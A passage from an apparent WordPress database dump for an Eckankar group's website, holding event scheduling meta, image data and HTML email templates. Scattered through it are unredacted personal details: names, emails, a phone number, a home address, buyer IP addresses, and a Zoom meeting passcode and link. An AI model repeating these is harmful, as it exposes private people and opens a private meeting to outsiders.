center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(158227,266474,'mec_event_status','EventScheduled'),(158228,266474,'mec_moved_online_link',''),(158229,266474,'mec_cancelled_reason',''),(158230,266474,'mec_display_cancellation_reason_in_single_page',''),(158231,266474,'protect_children',''),(158232,266474,'passster_activate_global_protection',NULL),(158233,266474,'passster_activate_protection',NULL),(158234,266474,'passster_protection_type','password'),(158235,266474,'boldgrid_hide_page_title','0'),(158236,266474,'_thumbnail_id','266472'),(158237,266474,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(158240,266474,'_dp_original','266432'),(158239,266474,'boldgrid_in_page_containers','1'),(158241,266474,'_edit_lock','1649387264:2'),(158242,266474,'_edit_last','2'),(161163,266633,'mec_tickets','a:0:{}'),(161651,266676,'mec_additional_location_ids','a:0:{}'),(161633,266675,'_field_530','Michael &amp; Laurie '),(161634,266675,'_field_531','Cain'),(159882,266563,'_wp_attached_file','2022/04/grandma-family.jpg'),(159883,266563,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:706;s:6:\"height\";i:397;s:4:\"file\";s:26:\"2022/04/grandma-family.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"grandma-family-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"grandma-family-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"grandma-family-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"grandma-family-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"grandma-family-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"grandma-family-300x397.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161147,266633,'mec_end_date','2022-05-13'),(161146,266633,'mec_start_day_seconds','68400'),(161126,266633,'mec_more_info_target','_self'),(161127,266633,'mec_cost',''),(161128,266633,'mec_currency','a:0:{}'),(161129,266633,'mec_additional_organizer_ids','a:0:{}'),(161130,266633,'mec_additional_location_ids','a:0:{}'),(161131,266633,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-13\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-13\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(161245,266654,'mec_price','0'),(161104,266631,'_field_530','Christie'),(161105,266631,'_field_531','Holliday'),(161106,266631,'_field_532','choll.03@comcast.net'),(161107,266631,'_field_535','Hi Hannah!\n\nMy husband, Bill Rogers will also be attending. We will bring some food/beverages from the P-S category.\n\n:-) Christie'),(161123,266633,'mec_read_more',''),(161124,266633,'mec_more_info',''),(161125,266633,'mec_more_info_title',''),(161236,266654,'mec_all_dates','a:0:{}'),(160846,264262,'sf_refine','0'),(160845,264262,'sf_reset_button','0'),(161241,266654,'mec_book_date_submit','20220506062057'),(161240,266654,'mec_attention_time_end','1652052600'),(161239,266654,'mec_attention_time_start','1652005800'),(161639,266676,'protect_children',''),(161640,266676,'mec_color',''),(161641,266676,'mec_location_id','131'),(161642,266676,'mec_dont_show_map','0'),(161643,266676,'mec_organizer_id','1'),(161644,266676,'mec_read_more',''),(161645,266676,'mec_more_info',''),(161189,266633,'_thumbnail_id','266634'),(161807,266688,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161806,266688,'mec_hourly_schedules','a:0:{}'),(161792,266688,'mec_end_date','2022-05-11'),(161793,266688,'mec_end_time_hour','11'),(161794,266688,'mec_end_time_minutes','30'),(161795,266688,'mec_end_time_ampm','AM'),(161796,266688,'mec_end_day_seconds','41400'),(161797,266688,'mec_repeat_status','1'),(161798,266688,'mec_repeat_type','advanced'),(161799,266688,'mec_repeat_interval','1'),(161800,266688,'mec_repeat_end','occurrences'),(161801,266688,'mec_repeat_end_at_occurrences','11'),(161802,266688,'mec_repeat_end_at_date',''),(161803,266688,'mec_advanced_days','a:1:{i:0;s:5:\"Wed.2\";}'),(161804,266688,'mec_in_days',''),(161805,266688,'mec_not_in_days',''),(161791,266688,'mec_start_day_seconds','37800'),(161790,266688,'mec_start_time_ampm','AM'),(161789,266688,'mec_start_time_minutes','30'),(161788,266688,'mec_start_time_hour','10'),(161787,266688,'mec_start_date','2022-05-11'),(161786,266688,'mec_public','1'),(161785,266688,'mec_countdown_method','global'),(161784,266688,'mec_timezone','global'),(161783,266688,'mec_comment',''),(161782,266688,'mec_hide_end_time','0'),(161781,266688,'mec_hide_time','0'),(161780,266688,'one_occurrence','0'),(161779,266688,'mec_allday','0'),(161775,266688,'mec_additional_location_ids','a:0:{}'),(161776,266688,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.2\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(161777,266688,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.2\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(161778,266688,'mec_certain_weekdays','a:0:{}'),(161712,266682,'_field_133','Karen '),(161713,266682,'_field_134','Smith'),(161714,266682,'_field_135','radiance124@icloud.com'),(161715,266682,'_field_137','how to join Easy Way Class '),(161716,266682,'_field_138','Hello,  I am new this year to Eckankar and am interested in joining  The Easy Way classes.  Can you please let me know how to join.   I can\'t seem to find it navigating on my own.  Have been reading the book and would love to become more involved and join the class.   Karen Smith 303-921-8781 '),(161214,266644,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"class1coldwell@gmail.com\";s:4:\"name\";s:5:\"David\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"70.77.244.109\";}}'),(161213,266644,'mec_ticket_price_1','0'),(161212,266644,'mec_booking_location','129'),(161211,266644,'mec_book_date_submit','20220503214723'),(161210,266644,'mec_attention_time_end','1652052600'),(161209,266644,'mec_attention_time_start','1652005800'),(161208,266644,'mec_attention_time','1652005800:1652052600'),(161207,266644,'mec_other_dates','a:0:{}'),(161206,266644,'mec_all_dates','a:0:{}'),(161205,266644,'mec_booking_time','2022-05-03 21:47:23'),(161202,266644,'mec_event_id','266568'),(161203,266644,'mec_date','1652005800:1652052600'),(161204,266644,'mec_ticket_id',',1,'),(161201,266644,'mec_confirmed','1'),(161200,266644,'mec_cancellation_key','d3b4852fa4b1475c908ac29b280ca009'),(161774,266688,'mec_additional_organizer_ids','a:0:{}'),(161773,266688,'mec_currency','a:0:{}'),(161771,266688,'mec_more_info_target','_self'),(161772,266688,'mec_cost',''),(161770,266688,'mec_more_info_title',''),(161769,266688,'mec_more_info',''),(161768,266688,'mec_read_more',''),(161767,266688,'mec_organizer_id','1'),(161766,266688,'mec_dont_show_map','0'),(161765,266688,'mec_location_id','145'),(161762,266686,'mec_gateway_label','Free'),(161760,266686,'mec_price','0'),(161761,266686,'mec_gateway','MEC_gateway_free'),(159806,266561,'_field_133','DONNA'),(159807,266561,'_field_134','a DEMSKY'),(159808,266561,'_field_135','donnademsky13@gmail.com'),(159809,266561,'_field_137','books'),(159810,266561,'_field_138','I am really interested in two books. past lives, dream and soul. and 35 Golden keys to who you are and why your here.\n\na drunk hit me and I\'m lost in every aspect.\n\nmy address is 6875 n Windview circle\nParker Colorado 80134\n\nwill you please send me these two books?\n\nthank you\nbe safe'),(159811,266561,'_form_id','13'),(159812,266561,'_seq_num','105'),(161759,266686,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"24.183.133.105\";}}'),(161758,266686,'mec_ticket_price_1','0'),(161757,266686,'mec_booking_location','144'),(161756,266686,'mec_book_date_submit','20220517182641'),(161755,266686,'mec_attention_time_end','1652817600'),(161748,266686,'mec_date','1652814000:1652817600'),(161749,266686,'mec_ticket_id',',1,'),(161750,266686,'mec_booking_time','2022-05-17 18:26:41'),(161751,266686,'mec_all_dates','a:0:{}'),(161752,266686,'mec_other_dates','a:0:{}'),(161753,266686,'mec_attention_time','1652814000:1652817600'),(161754,266686,'mec_attention_time_start','1652814000'),(161746,266686,'mec_confirmed','1'),(161747,266686,'mec_event_id','266611'),(161745,266686,'mec_cancellation_key','6ef4083467f460a5fec8643839becfb2'),(161744,266686,'mec_verification_key','dc7951d564ec2bf49fdb89ccfceba94b'),(161743,266686,'mec_verified','1'),(161742,266686,'mec_user_id','1000015'),(159885,266563,'original-file','2022/04/grandma-family-updraft-pre-smush-original.jpg'),(159886,266563,'smush-complete','1'),(159887,266563,'smush-info','The file was compressed from 101.60 KB to 95.60 KB saving 5.91 percent using WP-Optimize'),(159888,266563,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:104041;s:12:\"smushed-size\";i:97891;s:15:\"savings-percent\";d:5.910000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:104041;s:10:\"compressed\";i:97891;}s:6:\"medium\";a:2:{s:8:\"original\";i:21349;s:10:\"compressed\";i:20561;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10173;s:10:\"compressed\";i:10107;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31517;s:10:\"compressed\";i:30423;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:52005;s:10:\"compressed\";i:50207;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:37553;s:10:\"compressed\";i:36067;}s:8:\"tileview\";a:2:{s:8:\"original\";i:40324;s:10:\"compressed\";i:38934;}}}'),(159804,266560,'_form_id','21'),(159805,266560,'_seq_num','147'),(159802,266560,'_field_228','US'),(159803,266560,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(159791,266540,'_thumbnail_id','266160'),(159792,266559,'_field_530','Greg'),(159793,266559,'_field_531','VonRiesen'),(159794,266559,'_field_532','gvonriesen@comcast.net'),(159795,266559,'_field_535',''),(159796,266559,'_form_id','56'),(159797,266559,'_seq_num','4'),(159798,266560,'_field_224','DONNA'),(159799,266560,'_field_225','DEMSKY'),(159800,266560,'_field_226','donnademsky13@gmail.com'),(159801,266560,'_field_227','CO'),(159004,266522,'mec_color',''),(159005,266522,'mec_location_id','118'),(159006,266522,'mec_dont_show_map','0'),(159007,266522,'mec_organizer_id','1'),(159008,266522,'mec_read_more',''),(159009,266522,'mec_more_info',''),(159010,266522,'mec_more_info_title',''),(159011,266522,'mec_more_info_target','_self'),(159012,266522,'mec_cost',''),(159013,266522,'mec_currency','a:0:{}'),(159014,266522,'mec_additional_organizer_ids','a:0:{}'),(159015,266522,'mec_additional_location_ids','a:0:{}'),(159016,266522,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-30\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-30\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159017,266522,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159018,266522,'mec_certain_weekdays','a:0:{}'),(159019,266522,'mec_allday','0'),(159020,266522,'one_occurrence','0'),(159021,266522,'mec_hide_time','0'),(159022,266522,'mec_hide_end_time','0'),(159023,266522,'mec_comment',''),(159024,266522,'mec_timezone','global'),(159025,266522,'mec_countdown_method','global'),(159026,266522,'mec_public','1'),(159027,266522,'mec_start_date','2023-04-30'),(159028,266522,'mec_start_time_hour','10'),(159029,266522,'mec_start_time_minutes','30'),(159030,266522,'mec_start_time_ampm','AM'),(159031,266522,'mec_start_day_seconds','37800'),(159032,266522,'mec_end_date','2023-04-30'),(159033,266522,'mec_end_time_hour','12'),(159034,266522,'mec_end_time_minutes','0'),(159035,266522,'mec_end_time_ampm','PM'),(159036,266522,'mec_end_day_seconds','43200'),(159037,266522,'mec_repeat_status','0'),(159038,266522,'mec_repeat_type',''),(159039,266522,'mec_repeat_interval','1'),(159040,266522,'mec_repeat_end',''),(159041,266522,'mec_repeat_end_at_occurrences',''),(159042,266522,'mec_repeat_end_at_date',''),(159043,266522,'mec_advanced_days','a:0:{}'),(159044,266522,'mec_in_days',''),(159045,266522,'mec_not_in_days',''),(159046,266522,'mec_hourly_schedules','a:0:{}'),(159047,266522,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(159048,266522,'mec_tickets','a:0:{}'),(159049,266522,'mec_fees_global_inheritance','1'),(159050,266522,'mec_fees','a:0:{}'),(159051,266522,'mec_ticket_variations_global_inheritance','1'),(159052,266522,'mec_ticket_variations','a:0:{}'),(159053,266522,'mec_reg_fields_global_inheritance','1'),(159054,266522,'mec_reg_fields','a:0:{}'),(159055,266522,'mec_bfixed_fields','a:0:{}'),(159056,266522,'mec_op','a:0:{}'),(159057,266522,'mec_fields','a:0:{}'),(159058,266522,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9914:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      